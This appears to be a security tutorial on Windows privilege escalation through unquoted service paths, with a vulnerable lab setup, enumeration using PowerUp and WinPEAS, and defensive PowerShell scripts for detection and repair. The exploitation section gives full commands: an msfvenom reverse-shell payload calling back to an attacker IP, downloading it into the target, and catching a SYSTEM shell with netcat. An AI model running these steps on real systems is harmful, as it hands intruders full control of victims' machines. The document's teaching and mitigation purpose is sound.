
Windows Privilege Escalation: Unquoted Service Path

supremeusa

Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components, including services, files, and registry entries. Exploiting an unquoted service path is one technique for escalating privileges.

An unquoted service path is reported as a critical vulnerability in Windows: it allows an attacker holding a low-privileged user account to escalate to NT AUTHORITY\SYSTEM.



Table of Contents
  • Introduction
  • Vulnerability Insight
  • Prerequisite
  • Lab Setup
  • Abusing Unquoted Service Paths
  • Mitigation

Introduction

Unquoted Service Path

An installed service has an unquoted service path when the path to its binary contains spaces and is not enclosed in quotes. As a result, a local user who can write to a higher-level directory within that path can place an executable there and obtain a shell with administrator-level privileges.

Mitre ID: T1574.009

Tactics: Privilege Escalation & Persistence

Platforms: Windows

Vulnerability Insight

When a service's path contains spaces and is not enclosed in quotation marks, the Windows API has to guess where the referenced application is located. For example, if a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will look for the executable at the following locations, in order from 1 to 4, and a malicious binary planted at one of the earlier locations through a writable directory will be run instead of the real one:

1. C:\Program.exe

2. C:\Program Files\Ignite.exe

3. C:\Program Files\Ignite Data\Vuln.exe

4. C:\Program Files\Ignite Data\Vuln Service\file.exe
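
The lookup sequence above can be computed mechanically, and so can the permission check the article later performs by hand with icacls. The following PowerShell functions are an added example, not code from the article or from PowerUp: Get-UnquotedPathCandidates splits an unquoted binary path at each space into the candidates Windows will try, and Get-LowPrivWritableDirectories reports the candidate directories in which the identities every standard user belongs to (BUILTIN\Users, Authenticated Users, Everyone) are allowed to create files, i.e. where a planted binary would be picked up. The function names are mine; the sample path is the article's.

```powershell
# Added example (not from the original article or PowerUp). Function names are
# hypothetical; the sample path is the article's "vulns" service path.

function Get-UnquotedPathCandidates {
    <#
      Return, in lookup order, the executables Windows will try for an unquoted
      service path. Each prefix ending at a space is tried with ".exe" appended,
      until the token that names the real executable is reached.
    #>
    param([Parameter(Mandatory)][string]$BinaryPath)

    $tokens = $BinaryPath.Trim() -split '\s+'
    $candidates = @()
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if ($prefix -notmatch '\.exe$') { $prefix += '.exe' }
        $candidates += $prefix
        # Stop once the prefix reaches the real executable; anything after it is arguments
        if ($tokens[$i - 1] -match '\.exe$') { break }
    }
    return $candidates
}

function Get-LowPrivWritableDirectories {
    <#
      For each candidate, look at the directory it would live in and report any
      Allow ACE that lets a low-privileged identity create files there.
    #>
    param([Parameter(Mandatory)][string[]]$Candidates)

    # Identities every standard user belongs to by default
    $lowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    # CreateFiles (= WriteData) is the right needed to drop a file into a directory;
    # some ACEs carry untranslated GENERIC_WRITE / GENERIC_ALL bits instead.
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $genericWriteOrAll = 0x40000000 -bor 0x10000000

    foreach ($candidate in $Candidates) {
        $dir = Split-Path -Parent $candidate
        if (-not (Test-Path -LiteralPath $dir)) { continue }   # no such directory, nothing to plant into
        $acl = Get-Acl -LiteralPath $dir
        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($lowPriv -notcontains $rule.IdentityReference.Value) { continue }
            $rights = [int]$rule.FileSystemRights
            if (($rights -band $createFiles) -ne 0 -or ($rights -band $genericWriteOrAll) -ne 0) {
                [pscustomobject]@{
                    Directory  = $dir
                    Identity   = $rule.IdentityReference.Value
                    Rights     = $rule.FileSystemRights
                    WouldRunAs = $candidate   # the binary name Windows would execute from here
                }
                break   # one finding per directory is enough
            }
        }
    }
}

# Usage with the article's example path
$path = 'C:\Program Files\Ignite Data\Vuln Service\file.exe'
Get-UnquotedPathCandidates -BinaryPath $path
Get-LowPrivWritableDirectories -Candidates (Get-UnquotedPathCandidates -BinaryPath $path)
```

On the lab machine built in this article, the second call reports “C:\Program Files\Ignite Data” for BUILTIN\Users, with Vuln.exe as the binary that would run in place of file.exe; on a correctly configured system it returns nothing, because every directory along the path is writable only by administrators.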

Prerequisite

Target Machine: Windows 10

Attacker Machine: Kali Linux

Tools: SubInACL, PowerUp.ps1, WinPEAS.

Condition: A low-privilege foothold on the target machine, obtained with Metasploit, Netcat or similar.

Objective: Escalate a low-privileged user to NT AUTHORITY\SYSTEM by exploiting the unquoted service path vulnerability.

Lab Setup

To set up a vulnerable environment for an unquoted service path, we need two user accounts. Here we have the user “ignite”, who is a member of the Administrators group, and “shreya”, who is a member of the Users group.

Code:
net user ignite
net user shreya



Steps to Setup Vulnerable Environment

Step 1: Create a new folder and a sub-folder named “Ignite Data” and “Vuln Service” respectively.

Code:
mkdir "C:\Program Files\Ignite Data\Vuln Service"

Step 2: Create a vulnerable service named “vulns” whose binary path points to file.exe.

Code:
sc create "vulns" binpath= "C:\Program Files\Ignite Data\Vuln Service\file.exe" start= auto



Step 3: Grant write permission to BUILTIN\Users on the “Ignite Data” folder with the help of icacls.

Code:
icacls "C:\Program Files\Ignite Data" /grant "BUILTIN\Users":W



icacls is a native Microsoft Windows command-line program that can display and modify permissions on directories and files.




Step 4: To make the service exploitable by the low-privileged user, we also need to grant some dangerous service permissions with the help of SubInACL, which can change the permissions on services.

NOTE:


SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.



In this case, we have granted a user permissions to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:


Step 5: After downloading SubInACL, execute the following command to assign the PTO permissions (pause/continue, start and stop) to the user “shreya” on the “vulns” service.

Code:
subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO



Abusing Unquoted Service Paths

Abusing an unquoted service path is a technique that exploits insecure file permissions in order to escalate privileges for local users. Download the PowerUp.ps1 script on Kali Linux; it returns the name and binary path of every service whose path is unquoted and contains a space.

Code:
# use the raw file URL so wget fetches the script itself rather than the GitHub HTML page
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python -m SimpleHTTPServer 80



Get initial access to the target machine, transfer PowerUp.ps1 and run the Get-UnquotedService command. It uses Get-WmiObject to query all Win32_Service objects, extracts the binary path name of each, and then checks whether any binary path contains a space and is not quoted.

Code:
nc -lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1 -OutFile PowerUp.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService

As a result, we have enumerated the path of file.exe, as highlighted in the image below.



The path above consists of three directories, “Program Files”, “Ignite Data” and “Vuln Service”, and for each directory we use icacls to check its permissions.

Code:
icacls "C:\Program Files"
icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln Service"

Here we find that BUILTIN\Users has write permission on “Ignite Data”.



Alternatively, using the automated WinPEASx64 script we can enumerate the suspicious file and folder behind the unquoted path.

Code:
winPEASx64.exe quiet servicesinfo



As a result, it shows the same finding as above.



It’s time to exploit the weakly configured service through its unquoted path in order to escalate privileges for the user shreya. As we know, the unquoted folder name is “Vuln Service”, so we create a file named Vuln.exe with the help of msfvenom.

Code:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > Vuln.exe
python -m SimpleHTTPServer 80



Start a fresh netcat listener in a new terminal and transfer Vuln.exe into the “Ignite Data” folder on the target machine. Since shreya is a member of BUILTIN\Users, which has write permission on “Ignite Data”, the file can be dropped there, and restarting the service will result in a reverse connection.

Code:
cd "C:\Program Files\Ignite Data"
powershell wget http://192.168.1.3/Vuln.exe -OutFile Vuln.exe
net start vulns



As soon as the service launches, the attacker gets a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.

Code:
nc -lvp 8888
whoami



Alternatively, if the user is permitted to restart the system, a reboot will start the “vulns” service automatically (it was created with start= auto), which launches Vuln.exe and again provides a reverse connection.

Code:
shutdown /r /t 0



After the reboot, the service launches and the attacker again receives a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.

Code:
nc -lvp 8888



Mitigation

Vulnerability Solution: Ensure that any services that contain a space in the path enclose the path in quotes.

Restrict File and Directory Permissions: Restrict write access to the directories and files along service paths so that only administrators and the service's own privileged account can modify them; ordinary users should have no write permission on any directory in the path.

Execution Prevention: Block execution of code on a system through application control, and/or script blocking.
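
The enumeration that Get-UnquotedService performs, and the fix the first mitigation point calls for, can be scripted together. The following is an added example in PowerShell, not the article's or PowerUp's code: Get-UnquotedServicePath queries Win32_Service (as PowerUp does, here via Get-CimInstance) and returns every service whose executable path contains a space and is not quoted, together with the account it runs as, and Repair-UnquotedServicePath rewrites the service's ImagePath registry value with the executable quoted. The function names are mine; the example assumes the executable name ends in .exe so that trailing service arguments can be separated from the path.

```powershell
# Added example (not from the original article or PowerUp). Function names are
# hypothetical. Assumes the service executable ends in ".exe" so that any
# arguments following it can be split off before quoting.

function Get-UnquotedServicePath {
    <# Return services whose executable path contains a space and is not quoted. #>
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            # Split "<exe> <arguments>" at the first ".exe"; -match is case-insensitive
            if ($_.PathName -match '^(?<exe>.*?\.exe)(?<args>\s.*)?$') {
                $exe = $Matches.exe
                $exeArgs = $Matches.args   # $null when the service takes no arguments
                if ($exe.Contains(' ')) {
                    [pscustomobject]@{
                        Name       = $_.Name
                        StartName  = $_.StartName   # account the service runs as, e.g. LocalSystem
                        Exe        = $exe
                        Arguments  = $exeArgs
                        PathName   = $_.PathName
                    }
                }
            }
        }
}

function Repair-UnquotedServicePath {
    <#
      Rewrite the service's ImagePath with the executable in quotes. Supports
      -WhatIf so the change can be previewed; applying it needs administrator
      rights, and the service must be restarted for the new path to take effect.
    #>
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)]$Service)
    process {
        $quoted = '"' + $Service.Exe + '"' + $Service.Arguments
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Service.Name)"
        if ($PSCmdlet.ShouldProcess($Service.Name, "set ImagePath to $quoted")) {
            # ImagePath is REG_EXPAND_SZ, so keep that type when writing it back
            Set-ItemProperty -Path $key -Name ImagePath -Value $quoted -Type ExpandString
        }
    }
}

# Usage: list the findings, preview the fix, then apply it from an elevated shell
Get-UnquotedServicePath | Format-Table Name, StartName, PathName -AutoSize
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
# Get-UnquotedServicePath | Repair-UnquotedServicePath
```

For the single lab service, the equivalent one-off fix from an elevated command prompt is `sc config vulns binPath= "\"C:\Program Files\Ignite Data\Vuln Service\file.exe\""`, which writes the same quoted ImagePath. Quoting the path closes the lookup ambiguity, but the second mitigation point still applies: a directory along the path that BUILTIN\Users can write to remains a weakness even once the path is quoted.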

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
 
